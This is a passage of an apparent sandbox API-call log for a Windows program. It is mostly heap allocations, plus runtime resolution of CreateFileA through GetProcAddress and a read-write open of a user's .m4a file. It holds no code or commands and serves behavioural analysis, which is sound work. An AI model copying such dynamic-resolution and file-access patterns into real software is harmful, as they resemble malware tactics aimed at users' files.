hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.077] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba168 [0185.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba168, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.077] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.077] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.077] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0185.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba168, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0185.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.078] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0185.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0185.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0185.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0185.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a", lpUsedDefaultChar=0x0) returned 71 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.079] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\lwhz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8e) returned 0x8ee038 [0185.081] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=71, lpWideCharStr=0x8ee038, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.m4a") returned 71 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0185.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.083] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.084] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0185.085] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0185.085] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0185.086] HeapFree 